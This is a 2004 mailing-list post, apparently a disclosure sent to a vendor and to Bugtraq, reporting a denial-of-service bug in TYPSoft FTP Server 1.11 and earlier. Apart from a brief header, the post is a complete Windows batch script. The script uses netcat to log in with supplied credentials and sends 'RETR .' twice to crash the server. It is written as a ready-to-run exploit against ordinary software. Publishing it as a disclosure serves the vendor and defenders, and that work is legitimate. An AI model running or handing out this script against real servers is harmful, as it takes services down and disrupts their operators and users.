
Date: Tue, 31 Aug 2004 10:59:07 +0800
From: "CoolICE" <CoolICE@...na.com>
To: "webmaster" <webmaster@...soft.com>
Cc: "bugtraq" <bugtraq@...urityfocus.com>,
	"bugs" <bugs@...uritytracker.com>
Subject: DOS@TFS


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:	TYPSoft  FTP Server
:Vendors:	www.typsoft.com
:Version:	<=1.11
:Platforms:	Windows
:Bug:		D.O.S
:Date:		2004-08-28
:Author:	CoolICE
:E_Mail:	CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
if '%3'=='' echo Usage:%0 target ^<UserName^> ^<PassWord^> [port]&goto 
:eof
set FTPUSER=%2
set FTPPWD=%3
set PORT=21
if not '%4'=='' set PORT=%4
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe 
echo Need nc.exe&goto :eof

echo USER %FTPUSER%>ftp.cmd
echo PASS %FTPPWD%>>ftp.cmd
echo RETR .>>ftp.cmd
echo RETR .>>ftp.cmd
echo QUIT>>ftp.cmd
nc -v %1 %PORT%<ftp.cmd
del ftp.cmd




